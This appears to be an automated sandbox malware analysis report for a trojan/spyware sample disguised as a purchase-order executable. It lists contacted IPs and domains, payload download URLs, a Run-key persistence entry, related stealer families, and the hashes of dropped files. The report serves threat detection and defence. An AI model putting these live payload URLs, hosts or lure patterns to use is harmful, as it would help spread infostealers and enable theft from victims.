                                                                                                                                                                                          http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0M2E5alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://172.234.222.143:80/bjedealg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://44.221.84.105:80/cbecuogqejalg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://82.112.184.197/pfoxkxwneqnmhcscalg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2280831077.00000000005B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://82.112.184.197:80/eooelppalg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://ww99.przvgke.biz/bjedeTalg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://www.winimage.com/zLibDllSingleClientServicesUpdater.exe.9.drfalse
                                                                                                                                                                                                        http://82.112.184.197/ewvwgroUalg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://ww12.przvgke.biz/fauopp?usid=18&utid=28672494417alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://www.pmail.comPURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021D3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002597000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002596000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1642838997.000000007FB6F000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1634935767.0000000022065000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000000.1571834546.0000000000416000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                              http://ww12.przvgke.biz/alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://ocsp.sectigo.com0CPURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://ww99.przvgke.biz/fauoppalg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800849962.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizalg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800351712.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783458530.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://82.112.184.197/alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        13.248.148.254
                                                                                                                                                                                                                        		084725.parkingcrew.netUnited States
                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                        172.234.222.143
                                                                                                                                                                                                                        		przvgke.bizUnited States
                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                        72.52.179.174
                                                                                                                                                                                                                        		ww99.przvgke.bizUnited States
                                                                                                                                                                                                                        		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                        199.59.243.227
                                                                                                                                                                                                                        		76899.bodis.comUnited States
                                                                                                                                                                                                                        		395082BODIS-NJUSfalse
                                                                                                                                                                                                                        158.101.44.242
                                                                                                                                                                                                                        		checkip.dyndns.comUnited States
                                                                                                                                                                                                                        		31898ORACLE-BMC-31898USfalse
                                                                                                                                                                                                                        41.185.8.252
                                                                                                                                                                                                                        		lwaziacademy.comSouth Africa
                                                                                                                                                                                                                        		36943GridhostZAtrue
                                                                                                                                                                                                                        104.21.67.152
                                                                                                                                                                                                                        		reallyfreegeoip.orgUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        44.221.84.105
                                                                                                                                                                                                                        		npukfztj.bizUnited States
                                                                                                                                                                                                                        		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                        54.244.188.177
                                                                                                                                                                                                                        		pywolwnvd.bizUnited States
                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                        103.20.200.105
                                                                                                                                                                                                                        		webmail.thematman.com.auAustralia
                                                                                                                                                                                                                        		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUfalse
                                                                                                                                                                                                                        82.112.184.197
                                                                                                                                                                                                                        		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                        		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                        18.141.10.107
                                                                                                                                                                                                                        		ssbzmoy.bizUnited States
                                                                                                                                                                                                                        		16509AMAZON-02USfalse

                                                                                                                                                                                                                        Private

                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                        Analysis ID:1572131
                                                                                                                                                                                                                        Start date and time:2024-12-10 07:04:15 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 13m 35s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:40
                                                                                                                                                                                                                        Number of new started drivers analysed:3
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:PURCHASE REQUIRED DETAILS 000487958790903403.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winEXE@45/171@31/13
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 85%
                                                                                                                                                                                                                        • Number of executed functions: 89
                                                                                                                                                                                                                        • Number of non-executed functions: 194
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        01:05:18API Interceptor2x Sleep call for process: PURCHASE REQUIRED DETAILS 000487958790903403.exe modified
                                                                                                                                                                                                                        01:05:39API Interceptor10x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                        01:05:45API Interceptor53x Sleep call for process: ymafvvdS.pif modified
                                                                                                                                                                                                                        01:06:21API Interceptor199x Sleep call for process: msdtc.exe modified
                                                                                                                                                                                                                        06:05:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Sdvvfamy C:\Users\Public\Sdvvfamy.url
                                                                                                                                                                                                                        06:05:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Sdvvfamy C:\Users\Public\Sdvvfamy.url

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        13.248.148.254Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
                                                                                                                                                                                                                        http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                                                                                        http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                                                                                        http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ww38.watchdogsecurity.online/favicon.ico
                                                                                                                                                                                                                        65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                                                                                        • ww12.icodeps.com/?usid=26&utid=7334446481
                                                                                                                                                                                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ww38.fmoovies.to/
                                                                                                                                                                                                                        http://www.multipool.usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
                                                                                                                                                                                                                        http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ww38.pollyfill.io/favicon.ico
                                                                                                                                                                                                                        http://simxtrackredirecttszz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ww12.ngelit.com/favicon.ico
                                                                                                                                                                                                                        file.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                        • ww12.runfoxyrun.com/administrator/index.php?usid=18&utid=25958170171
                                                                                                                                                                                                                        172.234.222.143invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • fwiwk.biz/kbtuvb
                                                                                                                                                                                                                        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • fwiwk.biz/lrhpwoxhabbo
                                                                                                                                                                                                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • przvgke.biz/dadmwtnbmefxvi
                                                                                                                                                                                                                        PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • fwiwk.biz/mhwavs
                                                                                                                                                                                                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • fwiwk.biz/jwvwqanfys
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • htwqzczce.biz/qccuqoixlchlyacl
                                                                                                                                                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                        • fwiwk.biz/t
                                                                                                                                                                                                                        E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                        • fwiwk.biz/fvthsigvq
                                                                                                                                                                                                                        Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                        • fwiwk.biz/hbfipefumdnnq
                                                                                                                                                                                                                        AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • przvgke.biz/ejhxrp

                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        ssbzmoy.bizRFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        przvgke.bizRFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.138
                                                                                                                                                                                                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 172.234.222.138
                                                                                                                                                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                        • 172.234.222.143
                                                                                                                                                                                                                        76899.bodis.comZiraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 199.59.243.227
                                                                                                                                                                                                                        http://readabilityscore.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 199.59.243.226
                                                                                                                                                                                                                        http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 199.59.243.226
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                                                                                        • 199.59.243.225
                                                                                                                                                                                                                        S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                        • 199.59.243.225
                                                                                                                                                                                                                        xPUqa4qbDL.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 199.59.242.153
                                                                                                                                                                                                                        knjghuig.bizZiraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                                                                        • 18.141.10.107
                                                                                                                                                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                        • 18.141.10.107

                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        AKAMAI-ASN1EUla.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                        • 165.254.13.47
                                                                                                                                                                                                                        https://quiet-sun-5d9f.atmos4.workers.dev/loginGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.215.17.144
                                                                                                                                                                                                                        WebUI.dllGet hashmaliciousMetamorfoBrowse
                                                                                                                                                                                                                        • 172.233.20.237
                                                                                                                                                                                                                        WebUI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.233.20.237
                                                                                                                                                                                                                        EgnyteDesktopApp_3.19.0_148.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.200.0.17
                                                                                                                                                                                                                        Msig Insurance Europe.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.195.39.65
                                                                                                                                                                                                                        jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.109.128.196
                                                                                                                                                                                                                        jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.234.216.52
                                                                                                                                                                                                                        Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.195.39.65
                                                                                                                                                                                                                        https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.comGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                                                                                                                                                                                        • 104.116.245.11
                                                                                                                                                                                                                        AMAZON-02USOrden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 54.150.207.131
                                                                                                                                                                                                                        OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 54.150.207.131
                                                                                                                                                                                                                        OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 54.150.207.131
                                                                                                                                                                                                                        OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 54.150.207.131
                                                                                                                                                                                                                        rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                        • 18.218.112.132
                                                                                                                                                                                                                        rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                        • 54.99.33.239
                                                                                                                                                                                                                        rebirth.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                        rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                        • 35.155.250.157
                                                                                                                                                                                                                        rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                        • 13.50.115.226
                                                                                                                                                                                                                        rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                        • 34.242.244.192

                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1353216
                                                                                                                                                                                                                        Entropy (8bit):5.324375498442742
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:YC4VQjGARQNhiIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:YOCAR0iIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:D4BD8AD02E9CA15C4291FA5C0923C9D0
                                                                                                                                                                                                                        SHA1:836A1FA2A5493C7E396B30C7E4F02EABFD8DD092
                                                                                                                                                                                                                        SHA-256:2292F175A6F3446B74C35041073E348090E5252DC85B3D8C2B8C217435110016
                                                                                                                                                                                                                        SHA-512:38313457E2857C3E166C75AAE7BBB45203EBD4EBC9F8EB5875B1DB66FA851CC0858385B8125FFB571E6BD560039B4D764D8E98696060CFD51692B1E28ED7138B
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....3r......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1294848
                                                                                                                                                                                                                        Entropy (8bit):5.2826842616152305
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:tNUpaKghnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tCMKghsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:E8B15A90322FDFCB1E2921460BFC4D9B
                                                                                                                                                                                                                        SHA1:5D09913CB84D80777941C16C6A38C63957986AF2
